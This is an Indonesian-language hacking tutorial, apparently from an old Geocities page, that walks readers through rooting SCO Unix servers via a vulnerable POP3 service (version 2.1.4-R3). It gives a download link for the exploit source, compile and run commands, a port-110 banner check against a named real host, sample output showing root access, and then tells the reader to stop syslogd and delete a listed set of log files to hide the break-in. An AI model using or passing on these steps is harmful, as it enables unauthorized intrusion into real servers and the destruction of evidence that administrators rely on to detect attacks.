WIRELESS LAN sudah tidak aman lagi

Rahasia Hacking ke SCO

Penasaran dengan hacking yang dilakukan oleh Nick w0eTanG pada section DeFace ? Begitulah yang terlihat dari beberapa komentar dan perbincangan melalui channel #jasakom di dalnet, mengapa ? karena system yang di exploitnya termasuk sudah langka walaupun beberapa tahun yang silam cukup terkenal yaitu Sco.

Berikut adalah konsep yang di berikan oleh w0eTanG tentang bagaimana exploit bisa dilakukan dan merupakan hacker kedua setelah djava8zi yang telah bersedia memberikan ilmu "dewa" mereka dengan cuma-cuma demi kemajuan kita bersama. Berikut adalah penuturannya :

ngakar server SCO (cara simpel) di terjemahkan dari r00ting SCO servers (the simple way)
--------------------------------------------------------------------------------------

1. Alat2 yang diperlukan.
2. Cara meng-kompile.
3. Cara men-jalankan.
4. Mencari server SCO yang bisa ditembus.
5. Saatnya mengakar.
6. Setelah dapat akar .. selanjutnya ?

1. Alat2 yang diperlukan.
- shell *nix bole linux, irix, solaris, bsd.
- c compiler salah satunya gcc
- exploit nya :) -->> http://www.ddforce.nl/~dforce/exploits/sco-pop.c

2. Cara meng-kompile
- Gampang.. d/l exploitnya.. terus ketikk.. di shell kamu:

gcc sco-pop.c -o sco-pop

3. Cara men-jalankan
- Lakukan ini : ./sco-pop , akan tampil di layar anda:

[w0eTanG@root shell]$ ./sco-pop
Usage: ./sco-pop [offset]
Default offset is 0. It works against SCOPOP v2.1.4-R3

4. Mencari server SCO yang bisa ditembus
Saya tidak akan menerangkan bagaimana cara mencari server SCO, hanya cara melihat
bisa ditembus ato tidak. OK, jika kamu menemukan server SCO , telnet ke port 110,
caranya :

telnet www.sco.com 110

Jika output yang anda dapatkan adalah:

+OK SCO POP3 server (version 2.1.4-R3) at www.sco.com starting.

Artinya server SCO itu bisa ditembus.

5. Saatnya mengakar
OK, sekarang saatnya mengakar server ini, jalankan exploit anda terhadap server ini :

./sco-pop www.sco.com

Hasil di layar:
[w0eTanG@root shell]$ ./sco-pop www.sco.com
CONNECTED TO www.masquetheatre.org... SENDING DATA
+OK SCO POP3 server (version 2.1.4-R3) at www.sco.com starting.
-ERR Unknown command:

Sekarang ketik id terus enter kemudian id lagi dan enter. Id pertama tidak akan bekerja..
yang kedua bekerja.

Hasil di layar:
uid=0(root) gid=3(sys) groups=3(sys),0(root),1(other)

6. Setelah dapat akar .. selanjutnya ?
Sekarang kamu punya account root, ini berarti kamu bisa melakukan apa saja.. namun jangan
lupa untuk mematikan syslogd dan mendelete log filenya.

alamat log file :)
/var/adm
ctlog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/ctlog
messages -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/messages
sulog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/sulog
syslog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/syslog
utmp -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmp
utmpx -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmpx
wtmp -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmp
wtmpx -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmpx

Note : File bisa didapatkan di http://www.dforce.nl/~dforce/exploits/sco/sco-pop.c

Hosted by www.Geocities.ws